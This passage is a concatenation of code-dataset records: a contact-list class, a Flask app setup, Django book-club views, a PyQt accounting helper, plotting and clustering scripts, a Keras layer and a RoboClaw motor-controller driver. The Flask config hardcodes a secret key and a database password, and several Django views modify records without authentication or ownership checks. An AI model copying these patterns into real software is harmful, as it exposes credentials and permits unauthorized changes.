Contacto():\n\n #posición del registro a editar\n indice = -1\n #lista de contactos\n contactos = []\n\n #Método constructor\n def __init__(varClase, id, \\\n nombre, \\\n correo, \\\n movil):\n varClase.id = id\n varClase.nombre = nombre\n varClase.correo = correo\n varClase.movil = movil\n\n def actualizar(varClase, id, nombre, correo, movil):\n varClase.id = id\n varClase.nombre = nombre\n varClase.correo = correo\n varClase.movil = movil\n\n #Obtener la lista de Contactos o un contacto en particular desde un archivo\n @staticmethod\n def obtener(nombreArchivo, id=\"\"):\n lineas = open(nombreArchivo, \"r\")\n if id == \"\":\n Contacto.contactos = []\n Contacto.indice = -1\n for linea in 
lineas:\n                datos = linea.strip().split(\";\")\n                if len(datos)>=4:\n                    c = Contacto(datos[0], datos[1], datos[2], datos[3])\n                    Contacto.contactos.append(c)\n        else:\n            for linea in lineas:\n                datos = linea.strip().split(\";\")\n                if datos[0] == id:\n                    c = Contacto(datos[0], datos[1], datos[2], datos[3])\n                    return c\n        return None\n\n    #Convert the records into a matrix of strings\n    @staticmethod\n    def pasarMatriz():\n        matriz = []\n        for jesus in Contacto.contactos:\n            linea = []\n            linea.append(jesus.id)\n            linea.append(jesus.nombre)\n            linea.append(jesus.correo)\n            linea.append(jesus.movil)\n            matriz.append(linea)\n        return matriz\n\n    #Method to add a contact\n    @staticmethod\n    def agregar(id, nombre, correo, movil):\n        c = Contacto(id, nombre, correo, movil)\n        Contacto.contactos.append(c)\n\n    #Method to modify a contact\n    @staticmethod\n    def modificar(id, nombre, correo, movil):\n        if Contacto.indice in range(0, len(Contacto.contactos)):\n            Contacto.contactos[Contacto.indice].actualizar(id, nombre, correo, movil)\n\n    #Method to delete a contact\n    @staticmethod\n    def eliminar():\n        if Contacto.indice in range(0, len(Contacto.contactos)):\n            del Contacto.contactos[Contacto.indice]\n\n    #Method to sort the contact list\n    @staticmethod\n    def ordenar():\n\n        for i in range(len(Contacto.contactos)-1):\n            for j in range(i+1, len(Contacto.contactos)):\n                if Contacto.contactos[i].nombre > Contacto.contactos[j].nombre:\n                    #Swap contacts\n                    t = Contacto.contactos[i]\n                    Contacto.contactos[i] = Contacto.contactos[j]\n                    Contacto.contactos[j] = t\n\n\n    #Method to save the contacts to a file\n    @staticmethod\n    def guardar(nombreArchivo):\n        #Open the file for writing\n        archivo = open(nombreArchivo, \"w\")\n\n        for c in Contacto.contactos:\n            linea = c.id + \";\" + \\\n                    c.nombre + \";\" + \\\n                    c.correo + \";\" + \\\n                    c.movil\n            #write each record on its own line so obtener() can read it back\n            archivo.write(linea + \"\\n\")\n        #close the file\n        archivo.close()\n\n    \n\n    \n","sub_path":"Ciclo1/Semana6/CRUD Contactos/Contacto.py","file_name":"Contacto.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"642625963","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\nSECRET_KEY = 'Sup3r$3cretkey'\n\nUPLOAD_FOLDER = './app/static/uploads'\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI']=\"postgresql://profiles:calabar12@localhost/profiles\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\ndb = SQLAlchemy(app)\napp.config.from_object(__name__)\nfrom app import views","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"133000676","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\n\n# Create your views here.\n\ndef index(request):\n    request.session.flush()\n    return render(request, 'register.html')\n\ndef register(request):\n    if request.method == \"POST\":\n        errors = User.objects.reg_validator(request.POST)\n        if len(errors) != 0:\n            for key, value in errors.items():\n                messages.error(request, value)\n            return redirect('/')\n        hashed_pw = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()\n        new_user = User.objects.create(\n            first_name = request.POST['first_name'], \n            last_name = request.POST['last_name'],\n            email = request.POST['email'],\n            
password = hashed_pw,\n )\n request.session['user_id'] = new_user.id\n return redirect('/books')\n return redirect('/')\n\ndef login(request):\n if request.method == \"POST\":\n errors = User.objects.login_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/')\n if request.method == 'POST':\n the_user = User.objects.get(email=request.POST['email'])\n if bcrypt.checkpw(request.POST['password'].encode(), the_user.password.encode()):\n print(request.method)\n request.session['user_id'] = the_user.id\n request.session['greeting'] = the_user.first_name\n return redirect('/books')\n messages.error(request, \"Email or Password incorrect\")\n return redirect('/')\n\ndef logout(request):\n request.session.flush()\n return redirect('/')\n\ndef show_all(request):\n if \"user_id\" not in request.session:\n return redirect('/')\n else:\n context = {\n 'all_books': Book.objects.all(),\n 'the_user': User.objects.get(id=request.session['user_id'])\n }\n return render(request, 'showall.html', context)\n\ndef create_book(request):\n errors = Book.objects.book_validator(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/books')\n else:\n user = User.objects.get(id=request.session['user_id'])\n book = Book.objects.create(\n title = request.POST['title'],\n description = request.POST['description'],\n creator = user\n )\n user.favorited_books.add(book)\n return redirect(f'/books/{book.id}')\n\ndef show_one(request, user_id):\n context = {\n 'book': Book.objects.get(id=user_id),\n 'the_user': User.objects.get(id=request.session['user_id']),\n }\n return render(request, \"showone.html\", context)\n\ndef update(request, user_id):\n book = Book.objects.get(id=user_id)\n book.description = request.POST['description']\n book.save()\n return redirect(f'/books/{user_id}')\n\ndef delete(request, user_id):\n book = Book.objects.get(id=user_id)\n book.delete()\n return redirect('/books')\n\ndef favorite(request, user_id):\n user = User.objects.get(id=request.session['user_id'])\n book = Book.objects.get(id=user_id)\n user.favorited_books.add(book)\n return redirect(f'/books/{user_id}')\n\ndef unfavorite(request, user_id):\n user = User.objects.get(id=request.session['user_id'])\n book = Book.objects.get(id=user_id)\n user.favorited_books.remove(book)\n return redirect(f'/books/{user_id}')","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"82239614","text":"from django import forms\nfrom .models import CuttedUrl\nfrom django.core.exceptions import ValidationError\n\n\nclass URLForm(forms.Form):\n url = forms.URLField(label='Вставьте ссылку:')\n\n def clean_code(self):\n urls = CuttedUrl.objects.all()\n verifiable_code = self.cleaned_data.get('code')\n codes = []\n for obj in urls:\n codes.append(obj.code)\n if verifiable_code in codes:\n raise ValidationError('Такой код уже существует!')\n return verifiable_code\n","sub_path":"src/cutter/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"464669539","text":"# -*- coding: utf-8 -*-\n\nimport platform\nfrom PyQt4 import QtCore\n\nclass SAP_jurnal(object):\n def __init__ (self):\n pass\n \n def txtlst_debet(self):\n debet=QtCore.QStringList()\n 
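# The Django register/login views above follow the usual bcrypt pattern:
# store only the salted hash, then verify with checkpw. A standalone sketch
# of that flow (illustrative function names, not part of the views file):
import bcrypt

def hash_password(plain: str) -> str:
    # gensalt() embeds a random salt and cost factor in the hash itself
    return bcrypt.hashpw(plain.encode(), bcrypt.gensalt()).decode()

def check_password(plain: str, stored_hash: str) -> bool:
    return bcrypt.checkpw(plain.encode(), stored_hash.encode())

h = hash_password("hunter2")
assert check_password("hunter2", h) and not check_password("wrong", h)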
debet.append(\"-- pilih salah satu --\")\n debet.append(\"kas di tangan\")\n debet.append(\"peralatan\")\n debet.append(\"biaya listrik\")\n debet.append(\"biaya telepon\")\n debet.append(\"biaya gaji\")\n debet.append(\"kas di bank\")\n return debet\n \n def txtlst_kredit(self):\n kredit=QtCore.QStringList()\n kredit.append(\"-- pilih salah satu --\")\n kredit.append(\"modal\")\n kredit.append(\"penjualan\")\n kredit.append(\"kas di tangan\")\n kredit.append(\"pinjaman\")\n return kredit\n \n def txtlst_kredit_debet(self, debet):\n kredit=QtCore.QStringList()\n \n if debet == \"-- pilih salah satu --\":\n kredit.append(\"-- pilih salah satu debet --\")\n elif debet == \"kas di tangan\":\n kredit.append(\"modal\")\n kredit.append(\"penjualan\")\n elif debet == \"peralatan\":\n kredit.append(\"kas di tangan\")\n elif debet == \"biaya listrik\":\n kredit.append(\"kas di tangan\")\n elif debet == \"biaya telepon\":\n kredit.append(\"kas di tangan\")\n elif debet == \"biaya gaji\":\n kredit.append(\"kas di tangan\")\n elif debet == \"kas di bank\":\n kredit.append(\"kas di tangan\")\n kredit.append(\"pinjaman\")\n \n return kredit\n \n#======================================================================================================\n\n def int_debet(self, debet):\n if debet == \"kas di tangan\":\n result = 1\n elif debet == \"peralatan\":\n result = 2\n elif debet == \"biaya listrik\":\n result = 3\n elif debet == \"biaya telepon\":\n result = 4\n elif debet == \"biaya gaji\":\n result = 5\n elif debet == \"kas di bank\":\n result = 6\n return result\n \n def int_kredit(self, kredit):\n if kredit == \"modal\":\n result=1\n elif kredit == \"penjualan\":\n result=2\n elif kredit == \"kas di tangan\":\n result=3\n elif kredit == \"pinjaman\":\n result=4\n return result\n \n#======================================================================================================\n \n def view_tabel(self, dbase):\n tblview=QtCore.QProcess()\n tblviewarg=QtCore.QStringList()\n \n if platform.system() == \"Linux\":\n tblviewarg.append(dbase)\n tblview.startDetached(\"./tblview/jurnal.py\",tblviewarg)\n elif platform.system() == \"Windows\":\n tblviewarg.append(\"tblview\\jurnal.py\")\n tblviewarg.append(dbase)\n tblview.startDetached(\"pythonw\",tblviewarg)\n \n def search_tabel(self, dbase, search_field, search_string):\n tblsearch=QtCore.QProcess()\n tblsearcharg=QtCore.QStringList()\n \n if platform.system() == \"Linux\":\n tblsearcharg.append(dbase)\n tblsearcharg.append(search_field)\n tblsearcharg.append(search_string)\n tblsearch.startDetached(\"./tblview/search.py\",tblsearcharg)\n elif platform.system() == \"Windows\":\n tblsearcharg.append(\"tblview\\search.py\")\n tblsearcharg.append(dbase)\n tblsearcharg.append(search_field)\n tblsearcharg.append(search_string)\n tblsearch.startDetached(\"pythonw\",tblsearcharg)\n","sub_path":"sources/sap_jurnal.py","file_name":"sap_jurnal.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"558600564","text":"\n\nclass MethodOfLinesTVD(object):\n\n def plot(self):\n figs = [ ]\n for scheme in ['pcm2', 'plm2']:\n try:\n figs.append(self.with_scheme(scheme))\n except IOError as e:\n print(e)\n return figs\n\n\nclass RelativisticShocktube1(MethodOfLinesTVD):\n\n def with_scheme(self, scheme):\n import os\n import h5py\n import matplotlib.pyplot as plt\n\n base = 'RelativisticShocktube1-{0}'.format(scheme)\n chkpt = h5py.File (os.path.join('data', 
'{0}.0001.h5'.format(base)), 'r')\n d = chkpt['primitive']['density'][...]\n p = chkpt['primitive']['pressure'][...]\n u = chkpt['primitive']['velocity1'][...]\n\n fig = plt.figure()\n ax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8])\n ax1.plot(d, '-o', mfc='none', label=r'$\\rho$')\n ax1.plot(p, '-o', mfc='none', label=r'$p$')\n ax1.plot(u, '-o', mfc='none', label=r'$u$')\n ax1.legend(loc='best')\n fig.suptitle(base)\n return fig\n\n\n\ndef search(name, terms):\n if not terms: return True\n\n for term in terms:\n if term.startswith('~') and term[1:] in name:\n return False\n if not term.startswith('~') and term in name:\n return True\n return False\n\n\ndef main():\n import matplotlib.pyplot as plt\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"search_terms\", nargs='*', help=\"search terms to match in test figures\")\n parser.add_argument(\"-l\", \"--list\", action='store_true', help=\"only show the list of tests\")\n parser.add_argument(\"--pdf\", action='store_true', help=\"export figures to PDF\")\n args = parser.parse_args()\n\n plotters = [RelativisticShocktube1()]\n\n for plotter in plotters:\n\n name = plotter.__class__.__name__\n\n if not search(name, args.search_terms):\n continue\n\n print(plotter.__class__)\n\n if args.list:\n continue\n\n try:\n figs = plotter.plot()\n\n if args.pdf:\n [fig.savefig(name + '.pdf') for fig in figs]\n\n except IOError as e:\n print(e)\n\n if not args.pdf:\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Vis/RegressionRelativistic.py","file_name":"RegressionRelativistic.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"36829516","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author:Wen\r\n\"\"\"\r\nimport torch as t\r\ndef predict(Input,NumberClass):\r\n shape = Input.size()[2:]\r\n batchsize = Input.size()[0]\r\n Input = Input.view(batchsize,NumberClass,-1)\r\n Input = t.max(Input,1)[1].view(batchsize,shape[0],shape[1])\r\n return Input\r\n\r\nif __name__ == \"__main__\":\r\n a = t.Tensor(\r\n [[[[1.0,2.0],[5.0,2.0]],\r\n [[2.0,3.0],[4.0,2.0]]],\r\n [[[2.0,3.0],[2.0,3.0]],\r\n [[2.0,3.0],[1.0,2.0]]]]\r\n )\r\n s = predict(a ,2)\r\n print(s)\r\n for x in range(10):\r\n print(x)\r\n x = t.tensor([[1,0.5,0.5,0.5,0.6],[0.1,0.5,0.2,0.4,0.7]],dtype = t.float32)\r\n print((x>0.5).float())","sub_path":"evaluate/Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192947356","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nPhilippe M. 
Noël\nClustering Using REpresentatives (CURE) Algorithm -- Python 3\nOriginal Code from Harvard APMTH120\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nimport numpy as np\nimport scipy as scipy\nimport matplotlib.pyplot as plt\nfrom numpy import linalg\nfrom scipy import io\nfrom scipy.spatial.distance import pdist,squareform\nfrom scipy.cluster.hierarchy import dendrogram, linkage\nfrom scipy.cluster.hierarchy import fcluster\n\ndef CURE(X, N):\n    \"\"\" Clustering Using REpresentatives from .mat file \"\"\"\n    # randomly subsampling data to generate representatives\n    np.random.seed(3989) # other seeds could be used\n    X = X[:,np.random.permutation(N)]\n    N_reps = 300 # arbitrarily subsampling first 300 points\n    X_reps = X[:,0:N_reps]\n\n    # hierarchical clustering of subsample to get representatives\n    Z = linkage(X.T, 'single') # single linkage due to nature of data\n    k = 2 # 2 clusters\n    IDX_reps = fcluster(Z, k, criterion='maxclust')\n\n    # plotting representatives for visualization\n    plt.figure(1); plt.clf()\n    reds = np.vstack([X_reps[:,i] for i in range(N_reps) if IDX_reps[i] == 1])\n    blues = np.vstack([X_reps[:,i] for i in range(N_reps) if IDX_reps[i] == 2])\n    plt.plot(reds[:,0], reds[:,1], '.r'); plt.plot(blues[:,0], blues[:,1], '.b')\n    plt.legend(['Cluster #1', 'Cluster #2'])\n    plt.title('Representatives, N = ' + str(N_reps))\n\n    # going over data set to assign all points to clusters\n    distances, IDX = np.zeros(N_reps), np.zeros(N)\n    for i in range(N):\n        # find nearest representative to data point i\n        for j in range(N_reps):\n            distances[j] = np.linalg.norm(X[:,i] - X_reps[:,j])\n        # find nearest cluster and assign it\n        nearest = np.argmin(distances)\n        IDX[i] = IDX_reps[nearest]\n\n    # plotting clustered dataset\n    plt.figure(2); plt.clf()\n    reds = np.vstack([X[:,i] for i in range(N) if IDX[i] == 1])\n    blues = np.vstack([X[:,i] for i in range(N) if IDX[i] == 2])\n    plt.plot(reds[:,0], reds[:,1], '.r'); plt.plot(blues[:,0], blues[:,1], '.b')\n    plt.legend(['Cluster #1', 'Cluster #2'])\n    plt.title('Full Dataset, N = ' + str(N))\n\n\n\n\n# test driver & data generation\n# loading data\nX = scipy.io.loadmat('CURE_data.mat')['X']\nN = len(X[1,:])\nCURE(X, N)\n","sub_path":"CURE/CURE.py","file_name":"CURE.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"127676224","text":"import keras\nimport keras.backend as K\nfrom keras.utils import conv_utils\nfrom keras.engine import InputSpec\nfrom keras.engine import Layer\nfrom tensorflow import image as tfi\n\n\n# Credits to KeithWM for ResizeImages (see: https://stackoverflow.com/a/44900216)\n# slightly modified for current Keras version\nclass ResizeImages(Layer):\n    \"\"\"Resize Images to a specified size\n\n    # Arguments\n        output_size: Size of output layer width and height\n        data_format: A string,\n            one of `channels_last` (default) or `channels_first`.\n            The ordering of the dimensions in the inputs.\n            `channels_last` corresponds to inputs with shape\n            `(batch, height, width, channels)` while `channels_first`\n            corresponds to inputs with shape\n            `(batch, channels, height, width)`.\n            It defaults to the `image_data_format` value found in your\n            Keras config file at `~/.keras/keras.json`.\n            If you never set it, then it will be \"channels_last\".\n\n    # Input shape\n        - If `data_format='channels_last'`:\n            4D tensor with shape:\n            `(batch_size, rows, 
cols, channels)`\n - If `data_format='channels_first'`:\n 4D tensor with shape:\n `(batch_size, channels, rows, cols)`\n\n # Output shape\n - If `data_format='channels_last'`:\n 4D tensor with shape:\n `(batch_size, pooled_rows, pooled_cols, channels)`\n - If `data_format='channels_first'`:\n 4D tensor with shape:\n `(batch_size, channels, pooled_rows, pooled_cols)`\n \"\"\"\n def __init__(self, output_dim=(1, 1), data_format=None, **kwargs):\n super(ResizeImages, self).__init__(**kwargs)\n normalized_data_format = K.normalize_data_format(data_format)\n self.output_dim = conv_utils.normalize_tuple(output_dim, 2, 'output_dim')\n self.data_format = normalized_data_format\n self.input_spec = InputSpec(ndim=4)\n\n def build(self, input_shape):\n self.input_spec = [InputSpec(shape=input_shape)]\n\n def compute_output_shape(self, input_shape):\n if self.data_format == 'channels_first':\n return (input_shape[0], input_shape[1], self.output_dim[0], self.output_dim[1])\n elif self.data_format == 'channels_last':\n return (input_shape[0], self.output_dim[0], self.output_dim[1], input_shape[3])\n\n def _resize_fun(self, inputs, data_format):\n try:\n assert keras.backend.backend() == 'tensorflow'\n assert self.data_format == 'channels_last'\n except AssertionError:\n print(\"Only tensorflow backend is supported for the resize layer and accordingly 'channels_last' ordering\")\n output = tfi.resize_images(inputs, self.output_dim)\n return output\n\n def call(self, inputs):\n output = self._resize_fun(inputs=inputs, data_format=self.data_format)\n return output\n\n def get_config(self):\n config = {'output_dim': self.output_dim,\n 'data_format': self.data_format}\n base_config = super(ResizeImages, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n","sub_path":"src/CustomLayers.py","file_name":"CustomLayers.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"244955153","text":"\"\"\"Factory demo code from Orion Robotics, wrapped into classes.\"\"\"\nimport logging\nimport numpy\nimport pdb\nimport serial\nimport struct\nimport threading\nimport time\n\nimport roboclaw as rc\n\n# empirically measured\nTICKS_PER_REV = 253\nMAX_TICKS_PER_SECOND = 3336\n\nclass RoboClaw(object):\n \"\"\"Convenience class for talking to an Orion Robotics RoboClaw\n motor controller. Note: this code is just the factory demo\n code, rearranged and put into a class.\"\"\"\n\n def __init__(self, port):\n \"\"\"Open a serial port for talking to the RoboClaw motor controller,\n and initialize the controller.\n\n Args:\n port (string): the name of a device entry like '/dev/ttyACM0' or\n '/dev/ttyUSB0'.\n\n baudrate (int): for V4 (USB) Roboclaws, this value is ignored. For\n earlier models,this value should correspond to the switch settings\n on the board.\n\n max_ticks_per_second (int): ticks per second from the encoders when\n the motors are running at 100% duty cycle. This is empirically\n determined. 
Roboclaw needs this at start to report correct \"QPPS\".\n See the Roboclaw manual.\n\n Raises:\n IOError, if we can't open the indicated port for some reason.\n \"\"\"\n self.checksum = 0\n self.port = serial.Serial(port, timeout=0.5)\n #self.accel = accel\n #(p, i, d, q) = self.readM1pidq()\n #self.SetM1pidq(p, i, d, max_ticks_per_second)\n #(p, i, d, q) = self.readM2pidq()\n #self.SetM2pidq(p, i, d, max_ticks_per_second)\n def __del__(self):\n self.port.close()\n\n def sendcommand(self, address, command):\n self.checksum = address\n self.port.write(chr(address))\n self.checksum += command\n self.port.write(chr(command))\n return\n\n def readbyte(self):\n val = struct.unpack('>B', self.port.read(1))\n self.checksum += val[0]\n return val[0]\n\n def readsbyte(self):\n val = struct.unpack('>b', self.port.read(1))\n self.checksum += val[0]\n return val[0]\n\n def readword(self):\n val = struct.unpack('>H', self.port.read(2))\n self.checksum += (val[0] & 0xFF)\n self.checksum += (val[0] >> 8) & 0xFF\n return val[0]\n\n def readsword(self):\n val = struct.unpack('>h', self.port.read(2))\n self.checksum += val[0]\n self.checksum += (val[0] >> 8) & 0xFF\n return val[0]\n\n def readlong(self):\n val = struct.unpack('>L', self.port.read(4))\n self.checksum += val[0]\n self.checksum += (val[0] >> 8) & 0xFF\n self.checksum += (val[0] >> 16) & 0xFF\n self.checksum += (val[0] >> 24) & 0xFF\n return val[0]\n\n def readslong(self):\n val = struct.unpack('>l', self.port.read(4))\n self.checksum += val[0]\n self.checksum += (val[0] >> 8) & 0xFF\n self.checksum += (val[0] >> 16) & 0xFF\n self.checksum += (val[0] >> 24) & 0xFF\n return val[0]\n\n def writebyte(self, val):\n self.checksum += val\n return self.port.write(struct.pack('>B', val))\n\n def writesbyte(self, val):\n self.checksum += val\n return self.port.write(struct.pack('>b', val))\n\n def writeword(self, val):\n self.checksum += val\n self.checksum += (val >> 8) & 0xFF\n return self.port.write(struct.pack('>H', val))\n\n def writesword(self, val):\n self.checksum += val\n self.checksum += (val >> 8) & 0xFF\n return self.port.write(struct.pack('>h', val))\n\n def writelong(self, val):\n self.checksum += val\n self.checksum += (val >> 8) & 0xFF\n self.checksum += (val >> 16) & 0xFF\n self.checksum += (val >> 24) & 0xFF\n return self.port.write(struct.pack('>L', val))\n\n def writeslong(self, val):\n self.checksum += val\n self.checksum += (val >> 8) & 0xFF\n self.checksum += (val >> 16) & 0xFF\n self.checksum += (val >> 24) & 0xFF\n return self.port.write(struct.pack('>l', val))\n\n def M1Forward(self, val):\n self.sendcommand(128, 0)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def M1Backward(self, val):\n self.sendcommand(128, 1)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMinMainBattery(self, val):\n self.sendcommand(128, 2)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMaxMainBattery(self, val):\n self.sendcommand(128, 3)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def M2Forward(self, val):\n self.sendcommand(128, 4)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def M2Backward(self, val):\n self.sendcommand(128, 5)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def DriveM1(self, val):\n self.sendcommand(128, 6)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def DriveM2(self, val):\n self.sendcommand(128, 7)\n self.writebyte(val)\n 
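# The packet helpers above accumulate a running 8-bit sum of every byte sent
# (address, command, payload) and terminate each packet with the low 7 bits
# of that sum. A standalone sketch of the same checksum, outside the class
# (hypothetical helper for single-byte payloads, mirroring the logic above):
def packet_with_checksum(address, command, payload=b""):
    body = bytes([address, command]) + payload
    checksum = sum(body) & 0x7F  # low 7 bits of the byte sum
    return body + bytes([checksum])

# e.g. "M1 forward at half speed" (command 0, value 64) to address 128:
pkt = packet_with_checksum(128, 0, bytes([64]))
assert pkt[-1] == (128 + 0 + 64) & 0x7F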
self.writebyte(self.checksum & 0x7F)\n        return\n\n    def ForwardMixed(self, val):\n        self.sendcommand(128, 8)\n        self.writebyte(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def BackwardMixed(self, val):\n        self.sendcommand(128, 9)\n        self.writebyte(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def RightMixed(self, val):\n        self.sendcommand(128, 10)\n        self.writebyte(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def LeftMixed(self, val):\n        self.sendcommand(128, 11)\n        self.writebyte(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def DriveMixed(self, val):\n        self.sendcommand(128, 12)\n        self.writebyte(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def TurnMixed(self, val):\n        self.sendcommand(128, 13)\n        self.writebyte(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def readM1encoder(self):\n        self.sendcommand(128, 16)\n        enc = self.readslong()\n        status = self.readbyte()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (enc, status)\n        return (-1, -1)\n\n    def readM2encoder(self):\n        self.sendcommand(128, 17)\n        enc = self.readslong()\n        status = self.readbyte()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (enc, status)\n        return (-1, -1)\n\n    def readM1speed(self):\n        self.sendcommand(128, 18)\n        enc = self.readslong()\n        status = self.readbyte()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (enc, status)\n        return (-1, -1)\n\n    def readM2speed(self):\n        self.sendcommand(128, 19)\n        enc = self.readslong()\n        status = self.readbyte()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (enc, status)\n        return (-1, -1)\n\n    def ResetEncoderCnts(self):\n        self.sendcommand(128, 20)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def readversion(self):\n        self.sendcommand(128, 21)\n        return self.port.read(32)\n\n    def readmainbattery(self):\n        self.sendcommand(128, 24)\n        val = self.readword()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return val\n        return -1\n\n    def readlogicbattery(self):\n        self.sendcommand(128, 25)\n        val = self.readword()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return val\n        return -1\n\n    def SetM1pidq(self, p, i, d, qpps):\n        self.sendcommand(128, 28)\n        self.writelong(d)\n        self.writelong(p)\n        self.writelong(i)\n        self.writelong(qpps)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM2pidq(self, p, i, d, qpps):\n        self.sendcommand(128, 29)\n        self.writelong(d)\n        self.writelong(p)\n        self.writelong(i)\n        self.writelong(qpps)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def readM1instspeed(self):\n        self.sendcommand(128, 30)\n        enc = self.readslong()\n        status = self.readbyte()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (enc, status)\n        return (-1, -1)\n\n    def readM2instspeed(self):\n        self.sendcommand(128, 31)\n        enc = self.readslong()\n        status = self.readbyte()\n        crc = self.checksum & 0x7F\n        if crc == self.readbyte():\n            return (enc, status)\n        return (-1, -1)\n\n    def SetM1Duty(self, val):\n        self.sendcommand(128, 32)\n        self.writesword(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM2Duty(self, val):\n        self.sendcommand(128, 33)\n        self.writesword(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetMixedDuty(self, m1, m2):\n        self.sendcommand(128, 34)\n        self.writesword(m1)\n        self.writesword(m2)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM1Speed(self, val):\n        self.sendcommand(128, 35)\n        self.writeslong(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM2Speed(self, val):\n        
self.sendcommand(128, 36)\n        self.writeslong(val)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetMixedSpeed(self, m1, m2):\n        self.sendcommand(128, 37)\n        self.writeslong(m1)\n        self.writeslong(m2)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM1SpeedAccel(self, accel, speed):\n        self.sendcommand(128, 38)\n        self.writelong(accel)\n        self.writeslong(speed)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM2SpeedAccel(self, accel, speed):\n        self.sendcommand(128, 39)\n        self.writelong(accel)\n        self.writeslong(speed)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetMixedSpeedAccel(self, accel, speed1, speed2):\n        self.sendcommand(128, 40)\n        self.writelong(accel)\n        self.writeslong(speed1)\n        self.writeslong(speed2)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM1SpeedDistance(self, speed, distance, buffer):\n        self.sendcommand(128, 41)\n        self.writeslong(speed)\n        self.writelong(distance)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM2SpeedDistance(self, speed, distance, buffer):\n        self.sendcommand(128, 42)\n        self.writeslong(speed)\n        self.writelong(distance)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetMixedSpeedDistance(self, speed1, distance1, speed2, distance2, buffer):\n        self.sendcommand(128, 43)\n        self.writeslong(speed1)\n        self.writelong(distance1)\n        self.writeslong(speed2)\n        self.writelong(distance2)\n        self.writebyte(buffer)\n        self.writebyte(self.checksum & 0x7F)\n        return\n\n    def SetM1SpeedAccelDistance(self, accel, 